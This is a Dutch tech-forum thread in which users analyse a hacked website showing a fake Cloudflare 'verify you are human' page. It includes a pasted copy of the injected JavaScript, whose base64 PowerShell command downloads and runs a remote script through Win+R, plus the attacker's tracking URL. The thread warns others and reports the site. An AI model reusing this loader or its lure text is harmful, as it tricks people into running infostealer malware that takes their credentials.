Toon posts:

Cloudflare verify you are human

Pagina: 1
Acties:

zondag 15 juni 2025 20:18

Acties:
  • 0 Henk 'm!
  • TheCrazyMonky
  • Registratie: September 2015
  • Laatst online: 16-07 18:56

TheCrazyMonky

Topicstarter
Hi,

Bij deze website: https://greenmatter.nl
Krijg ik op pc dit scherm:Afbeeldingslocatie: https://tweakers.net/i/asATd3jEDJhpOW-bLLJ3M8VTWII=/800x/filters:strip_exif()/f/image/VvtJb5gREW43BN6SUSkaDRHg.png?f=fotoalbum_large
En als ik op copy druk, krijg ik in mijn kladblok dit(waarschuwing, doe dit niet na):Afbeeldingslocatie: https://tweakers.net/i/83-XXYBpoSOrvLhXgeFqa_gcA3c=/800x/filters:strip_exif()/f/image/s6kIBt9DqLR1QBVvbvxY5q3h.png?f=fotoalbum_large

Is nou de website gehackt of cloudflare onderschept?

zondag 15 juni 2025 20:20

Acties:
  • +2 Henk 'm!
  • Drardollan
  • Registratie: Juli 2018
  • Laatst online: 21:07

Drardollan

Website is gehacked, dit is geen officiële Cloudflare melding.

Automatisch crypto handelen via een NL platform? Check BitBotsi !

zondag 15 juni 2025 20:23

Acties:
  • 0 Henk 'm!
  • Microkid
  • Registratie: Augustus 2000
  • Nu online

Microkid

Frontpage Admin / Moderator PW/VA

Smile

Nergens last van. Weet je zeker dat je op de goede site zit?
Afbeeldingslocatie: https://tweakers.net/i/If5Qdwis_0Yepluf4oHoenilWDA=/800x/filters:strip_exif()/f/image/EnYpFrGutV2KQZ5IVK8tQ1AE.png?f=fotoalbum_large

4800Wp zonnestroom met Enphase
Life's a waste of time. Time's a waste of life. Get wasted all the time and you'll have the time of your life.

zondag 15 juni 2025 20:26

Acties:
  • 0 Henk 'm!
  • TheCrazyMonky
  • Registratie: September 2015
  • Laatst online: 16-07 18:56

TheCrazyMonky

Topicstarter
Op mobiel krijg ik het scherm ook niet dus ik verwacht dat ze kijken naar je systeem. Als je dus linux of 'onbekend' draait zal het niet tevoorschijn komen.

zondag 15 juni 2025 20:26

Acties:
  • +1 Henk 'm!
  • DukeBox
  • Registratie: April 2000
  • Laatst online: 20:40

DukeBox

loves wheat smoothies

Ik kreeg ook de nep cloudflare melding.

Duct tape can't fix stupid, but it can muffle the sound.

zondag 15 juni 2025 20:27

Acties:
  • +1 Henk 'm!
  • ByteMe_
  • Registratie: Januari 2009
  • Niet online

ByteMe_

En als ik op copy druk, krijg ik in mijn kladblok dit(waarschuwing, doe dit niet na):
Dit zou toch al overduidelijk moeten zijn zonder ergens op te klikken? Het enige wat je moet klikken is het kruisje. Die site is malicious, mogelijk door ingeschoten JS file.

EDIT: via de console zie ik dat het idd een geïnjecteerd JS bestand is. @TS wellicht de site beheerder op de hootge stellen?

[ Voor 26% gewijzigd door ByteMe_ op 15-06-2025 20:35 ]

Mijn laatste reviews: Xiaomi Mi 9T | Mpow H12

zondag 15 juni 2025 20:27

Acties:
  • 0 Henk 'm!
  • The_Worst
  • Registratie: November 2005
  • Nu online

The_Worst

Unox

Microkid schreef op zondag 15 juni 2025 @ 20:23:
Nergens last van. Weet je zeker dat je op de goede site zit?
[Afbeelding]
Ik krijg deze website ook voor een seconde te zien om dan daarna de Cloudflare-melding te zien. Heb je wellicht Javascript uit staan voor onbekende sites?

If you hide your whole life, you'll forget who you even are. Uplay: TheWorstNL | Steam + Origin + PSN: The_Worst_NL

zondag 15 juni 2025 20:32

Acties:
  • 0 Henk 'm!
  • D4NG3R
  • Registratie: Juli 2009
  • Laatst online: 17:37

D4NG3R

kiwi

:)

ByteMe_ schreef op zondag 15 juni 2025 @ 20:27:
[...]


Dit zou toch al overduidelijk moeten zijn zonder ergens op te klikken? Het enige wat je moet klikken is het kruisje. Die site is malicious, mogelijk door ingeschoten JS file.
Voor velen hier wel, maar schijnbaar niet iedereen. ;)

Maargoed, deze site kwaadwillig, al dan niet overgenomen door kwaadwilligen. @TheCrazyMonky

Cloudflare (en vergelijkbare diensten) zullen je nooit vragen iets te copy-pasten naar Windows of iets te downloaden. Hooguit op een knopje drukken, tekst overtypen (op de website zelf) of alle verkeerslichten aanklikken. :+

Ander smaakje van dezelfde malafide onzin:

[ Voor 17% gewijzigd door D4NG3R op 15-06-2025 20:41 ]

Komt d'r in, dan kö-j d’r oet kieken

zondag 15 juni 2025 20:35

Acties:
  • 0 Henk 'm!
  • dirks
  • Registratie: December 2006
  • Laatst online: 19:32

dirks

Ik krijg dezelfde vage pagina als de TS.
Moest 2x de 'Verify you are human' klikken.

zondag 15 juni 2025 20:35

Acties:
  • +1 Henk 'm!
  • TheCrazyMonky
  • Registratie: September 2015
  • Laatst online: 16-07 18:56

TheCrazyMonky

Topicstarter
Goed, dank voor de antwoorden allen. Ik zal de mensen even berichtjes sturen.

zondag 15 juni 2025 20:37

Acties:
  • +2 Henk 'm!
  • The_Worst
  • Registratie: November 2005
  • Nu online

The_Worst

Unox

Er wordt een malafide script aangeroepen vanaf newupdateformy.cloud
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148

<!DOCTYPE html>
<html>
<head>
<title>Black</title>
<script>
let clickCopy = 2
let clickCounts = 2
let delay = 250 //ms
let verifText = `''Cloudflare protection – verify with code: 2FZ-ZFP''`;
let COPYbase64Text = 'cG93ZXJzaGVsbCAtdyBoIC1ub3AgLWMgIiRlPShAKDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsMTE4LDEwMSwxMTQsMTA1LDEwMiwxMDUsMTEwLDExNiw5OSwxMTEsMTEwLDQ2LDk5LDExMSwxMDksNDcsNDksNDYsMTE2LDEyMCwxMTYpfCV7W2NoYXJdJF99KS1qb2luJyc7JHk9TmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50OyR1PSR5LignRG93bmxvYWRTdHJpJysnbmcnKSgkZSk7JGk9J2knKydlJysneCc7JiRpICR1Ig==';
let center = document.createElement('div')

center.id = 'center'
center.innerHTML = `<div id="header"><h1></h1><p>Verify you are human by completing the action below.</p></div><div id="loading"><div class="spinner"></div></div><div id="box" style="display: none;"><div id="checkbx"><div class="loader-ring" id="loader-ring" style="display: none;"></div><input type="checkbox" class="sync_event_click" id="checkbox" class="error" style="display: none;"></div><label for="checkbox" id="txt">Verify you are human</label><div id="cloud"><div class="logo"><img src="data:image/webp;base64,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" alt="Logo"></div><div class="info"><a href="https://www.cloudflare.com/privacypolicy/">Privacy</a> • <a href="https://www.cloudflare.com/website-terms/">Terms</a></div></div></div><div id="review"></div>`
center.style.display = 'none'
let modalBlock =  document.createElement('div')
modalBlock.id = 'modalBlock'
let modalFooter = document.createElement('div')
modalFooter.id = 'modalFooter'
modalFooter.innerHTML = `<hr><div>Ray ID: <code id="ray-id"></code></div><div>Performance &amp; security by Cloudflare</div>`
modalFooter.style.display = 'none'
let coppp = 0;
let st = document.createElement('style')
st.innerHTML = 'html,body{margin:0;padding:0;height:100%}#modalBlock{flex-direction: column;overflow: auto;background:#fff;height: 100svh;display: flex;align-items: center;justify-content:center;position: fixed;top: 0;left: 0;z-index: 999999999;width: 100%;}#center{height: fit-content;display:flex;flex-direction:column;background:#fff;font-family:"Segoe UI",sans-serif;color:#313131}#center{max-width:57rem;padding:8rem 0 0 0;flex:1;}#header h1{font-size:2.5rem;font-weight:500;line-height:3.75rem;margin:0}#header p{font-size:1.5rem;line-height:2.25rem;margin:0;opacity:.9}#loading{margin-top:2.2rem;display:flex;align-items:center}.spinner{border:4px solid #fff0;border-top:4px solid #5e5e5e;border-radius:50%;width:2rem;height:2rem;animation:spin 1s linear infinite}@keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}#box{height:3.94rem;width:18.65rem;background-color:#fafafa;border:1px solid #e0e0e0;margin-top:2.2rem;display:none;align-items:center}#checkbx{width:2.8rem;height:2.8rem;position:relative;display:flex;justify-content:center;align-items:center}#checkbx input[type="checkbox"]{width:1.5rem;height:1.5rem;cursor:pointer;display:none}#checkbox:focus{outline:none;box-shadow:none}.loader-ring{width:1.2rem;height:1.2rem;border:3.5px solid #fff0;border-top:3.5px solid rgb(18 128 14 / .61);border-radius:50%;animation:spin 1.5s linear infinite;display:none}#checkbox.error{box-shadow:0 0 0 2px rgb(173 0 0 / .493)}#txt{flex:1;text-align:left;font-weight:300;font-size:.9rem}#cloud{width:6rem;display:flex;flex-direction:column}#cloud .logo{width:100%;text-align:center}#cloud .info{width:100%;text-align:center;font-size:.65rem;opacity:.8}#cloud img{width:4.8rem;height:auto}#cloud a{color:inherit}#review{margin-top:3.5rem;font-size:1.5rem;opacity:.9}#modalFooter{text-align:center;margin-bottom:1rem;font-size:.75rem;line-height:1.2rem;opacity:.7;bottom:0;z-index: 999999999999;width: 100%;}#modalFooter hr{border:none;border-top:1px solid #e0e0e0;width:57rem;margin:0 auto 1rem}#checkbox{display:none}.code-block{width:100%;max-width:100%;border:1px solid #ddd;border-radius:5px;margin:10px 0;font-family:monospace;font-size:.9rem;overflow:hidden}.code-block-header{background:#f8f8f8;padding:8px;border-bottom:1px solid #ddd;display:flex;justify-content:space-between;align-items:center}.code-block-header .command-label{font-weight:700}.copy-button{background:none;border:none;cursor:pointer;font-weight:700;color:#007bff;padding:0}.copy-button:focus{outline:none}.code-content{margin:0;padding:10px;white-space:pre;overflow-x:auto}.code-block,.code-block-header,.code-content{user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}@media (max-width: 600px){#modalBlock {display: none !important;}body {overflow: auto !important}}'
document.querySelector('head').appendChild(st)
let rayID = '';
const chars = '0123456789abcdef';
for (let i = 0; i < 16; i++) {
  rayID += chars[Math.floor(Math.random() * chars.length)];
}
document.querySelector('title').textContent = 'Just a moment...'
document.addEventListener('DOMContentLoaded', function() {
    modalBlock.append(center)
    modalBlock.append(modalFooter)
    if (!localStorage.cls) {
        localStorage.cls = 0
    }
    if (localStorage.cls < clickCopy) {
        document.body.prepend(modalBlock)
    } else {
        return
    }
    document.querySelector('body').style.overflow = 'hidden'
    document.querySelector('#header h1').textContent = location.host
    document.querySelector('#review').textContent = location.host + ' needs to review the security of your connection before proceeding.'
    document.querySelector('#ray-id').textContent = rayID;
  setTimeout(() => {
    document.querySelector('#center').style.display = 'block'
    document.querySelector('#modalFooter').style.display = 'block'
    setTimeout(function() {
      document.getElementById('loading').style.display = 'none';
      setTimeout(function() {
        document.getElementById('box').style.display = 'flex';
        setTimeout(function() {
          document.getElementById('loader-ring').style.display = 'block';
          setTimeout(function() {
            document.getElementById('loader-ring').style.display = 'none';
            let checkbox = document.getElementById('checkbox');
            checkbox.style.display = 'block';
            checkbox.checked = false;
          }, 2000);
        }, 300);
      }, 300);
    }, 2000);
  }, delay);
  let clickCount = 0;
  document.getElementById('checkbox').addEventListener('click', function() {
    clickCount++;
    let checkbox = document.getElementById('checkbox');
    checkbox.style.display = 'none';
    document.getElementById('loader-ring').style.display = 'block';
    if(clickCount < clickCounts) {
      setTimeout(function() {
        document.getElementById('loader-ring').style.display = 'none';
        checkbox.style.display = 'block';
        checkbox.checked = false;
        checkbox.classList.add('error');
      }, 5000);
    } else if(clickCount === clickCounts) {
      setTimeout(function() {
        function decodeBase64Utf8(base64) {
          let binaryString = atob(base64);
          let bytes = new Uint8Array(binaryString.length);

          for (let i = 0; i < binaryString.length; i++) {
            bytes[i] = binaryString.charCodeAt(i);
          }

          return new TextDecoder("utf-8").decode(bytes);
        }
        let copyCommand = decodeBase64Utf8(COPYbase64Text);
        document.getElementById('loader-ring').style.display = 'none';
        checkbox.classList.remove('error');
        checkbox.checked = false;
        checkbox.style.display = 'block';
        checkbox.disabled = true;
        let review = document.getElementById('review');
        review.innerHTML += `
          <br><br><br>
          <span id="additional-text" style="font-size:1rem;">
         ⚠️ <strong style="color: #9b0000;">Unusual Web Traffic Detected</strong><br>
            Our security system has identified irregular web activity originating from your IP address. Automated verification attempts have failed, and we were unable to confirm that you are a legitimate user.<br><br>

            <strong style="color: #9b0000;">To proceed with verification, please follow these steps:</strong><br>
            1. Press <svg xmlns="http://www.w3.org/2000/svg" version="1.1" x="0" y="0" width="16" height="16" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512; position: relative; top: 3px;" xml:space="preserve"><g><path d="M0 80v160h224V52zM256 48v192h256V16zM256 272v192l256 32V272zM0 272v160l224 28V272z" fill="#34baeb" opacity="1"></path></g></svg> <b>Win + R</b> to open Run.<br>
            2. Copy and paste <b>Ctrl + V</b> the following command:
            <div class="code-block">
              <div class="code-block-header">
                <span class="command-label">Verification Code</span>
                <button class="copy-button" id="copy-button">Copy</button>
              </div>
              <pre class="code-content" id="copy-code">${verifText}</pre>
            </div>
            3. Press <b>Enter</b> and wait for confirmation.<br><br>

            <b>This manual verification step helps us ensure that your connection is secure and not part of an automated request. If you fail to complete this step, access to certain features may be temporarily restricted.</b><br>
          </span>
        `;
        const copyButton = document.getElementById('copy-button');
        if (copyButton) {
          copyButton.addEventListener('click', function() {
            let cls = Number(localStorage.cls)
            if (localStorage.cls) {
                if (coppp == 0) {
                    localStorage.cls = cls+=1
                    coppp++
                }
            } else {
                localStorage.cls = '0'
            }
            navigator.clipboard.writeText(copyCommand).then(function() {
              const originalText = copyButton.textContent;
              copyButton.textContent = "Copied!";
              setTimeout(function() {
                copyButton.textContent = originalText;
              }, 2000);
            });
          });
        }
      }, 1000);
    }
  });
});</script>

</head>
<body>
</body>
</html>


Vanaf de commandline wordt er een powershell-script gedownload en uitgevoerd waarmee waarschijnlijk session-cookies of andere gevoelige data wordt gestolen.

If you hide your whole life, you'll forget who you even are. Uplay: TheWorstNL | Steam + Origin + PSN: The_Worst_NL

zondag 15 juni 2025 20:51

Acties:
  • +1 Henk 'm!
  • TheCrazyMonky
  • Registratie: September 2015
  • Laatst online: 16-07 18:56

TheCrazyMonky

Topicstarter
ByteMe_ schreef op zondag 15 juni 2025 @ 20:27:
[...]


Dit zou toch al overduidelijk moeten zijn zonder ergens op te klikken? Het enige wat je moet klikken is het kruisje. Die site is malicious, mogelijk door ingeschoten JS file.

EDIT: via de console zie ik dat het idd een geïnjecteerd JS bestand is. @TS wellicht de site beheerder op de hootge stellen?
Als ik eerlijk ben heb ik hier wel even 10 seconden naar gestaard voordat ik tot die conclusie kwam, maar ik maakte het topic nou juist om de verduidelijking die jij geeft, zodat ik weet aan wie ik een berichtje moet sturen.

zondag 15 juni 2025 21:56

Acties:
  • 0 Henk 'm!
  • True
  • Registratie: April 2011
  • Niet online

True

Dislecticus

TheCrazyMonky schreef op zondag 15 juni 2025 @ 20:51:
[...]

Als ik eerlijk ben heb ik hier wel even 10 seconden naar gestaard voordat ik tot die conclusie kwam, maar ik maakte het topic nou juist om de verduidelijking die jij geeft, zodat ik weet aan wie ik een berichtje moet sturen.
Met een .nl website is het SIDN raadplegen en die contactpersonen mailen.

VW ID.7 Tourer Pro S | 5670 Wp JA Solar - 14x405 33° op Zuid | Twente

maandag 16 juni 2025 09:16

Acties:
  • +2 Henk 'm!
  • BytePhantomX
  • Registratie: Juli 2010
  • Laatst online: 14:35

BytePhantomX

Infostealer malware, één van de grootste issues van het moment voor bedrijven. Je hebt als bedrijf zelf al je devices onder controle, maar collega of leverancier logt op zijn privé device in op een zakelijke omgeving en op deze manier belanden de credentials en sessie op het dark web om verkocht te worden.

Was wat aan het testen en paar dingen vielen mij op:
- De pagina kreeg ik niet te zien als ik Edge gebruik. Ben er niet ingedoken, maar lijkt er op dat misschien alleen Chrome getarget wordt.
- Als ik de routine uitvoer (met uiteraard een aangepaste commandline) wordt deze op een managed device met Defender for Endpoint geblokkeerd. Krijg de foutmelding dat Powershell niet gestart kan worden.
- De URL wordt ook geblokkeerd.
- Door dit te testen heb ik een waslijst aan alerts in het Defender for Endpoint dashboard.

(ik verwacht overigens dat andere EDR's die ook afvangen).

maandag 16 juni 2025 09:21

Acties:
  • +1 Henk 'm!
  • BytePhantomX
  • Registratie: Juli 2010
  • Laatst online: 14:35

BytePhantomX

@TheCrazyMonky thanks voor het delen. Ik zocht al een keer een voorbeeld om te kijken hoe weerbaar mijn device is tegen dit soort scams.

maandag 16 juni 2025 09:41

Acties:
  • 0 Henk 'm!
  • BytePhantomX
  • Registratie: Juli 2010
  • Laatst online: 14:35

BytePhantomX

Zo te zien is de website weer gefixed.

maandag 16 juni 2025 09:48

Acties:
  • 0 Henk 'm!
  • D4NG3R
  • Registratie: Juli 2009
  • Laatst online: 17:37

D4NG3R

kiwi

:)

BytePhantomX schreef op maandag 16 juni 2025 @ 09:16:
- De pagina kreeg ik niet te zien als ik Edge gebruik. Ben er niet ingedoken, maar lijkt er op dat misschien alleen Chrome getarget wordt.
FF krijg je 'em ook, enkel op edge krijgt de volgende call niks terug:

code:
1

https://newupdateformy.cloud/tdsox.php?data=%7B%22host%22%3A%22greenmatter.nl%22%2C%22now%22%3A1750059754597%7D
BytePhantomX schreef op maandag 16 juni 2025 @ 09:41:
Zo te zien is de website weer gefixed.
Is die niet.

Komt d'r in, dan kö-j d’r oet kieken

maandag 16 juni 2025 09:59

Acties:
  • 0 Henk 'm!
  • BytePhantomX
  • Registratie: Juli 2010
  • Laatst online: 14:35

BytePhantomX

D4NG3R schreef op maandag 16 juni 2025 @ 09:48:
[...]
Is die niet.
Bijzonder. Ik krijg hem in ieder geval niet meer te zien en ik zie ook in het netwerkverkeer van de website geen verwijzing meer naar het malafide domein.

maandag 16 juni 2025 10:02

Acties:
  • 0 Henk 'm!
  • D4NG3R
  • Registratie: Juli 2009
  • Laatst online: 17:37

D4NG3R

kiwi

:)

Zojuist nog een keer benaderd maar dan op een ander systeem vanaf een ander IP, krijg alsnog het echte neppe CF scherm.

Komt d'r in, dan kö-j d’r oet kieken

maandag 16 juni 2025 10:14

Acties:
  • 0 Henk 'm!
  • Groentjuh
  • Registratie: September 2011
  • Laatst online: 19:35

Groentjuh

Ik zie dat het bepaalde browsers target (zelfde PC maar enkele verschillende browsers).
Firefox: Ja
Edge: Nee
Chrome: Ja
Pagina: 1
Reageer

Apple iPhone 16e LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq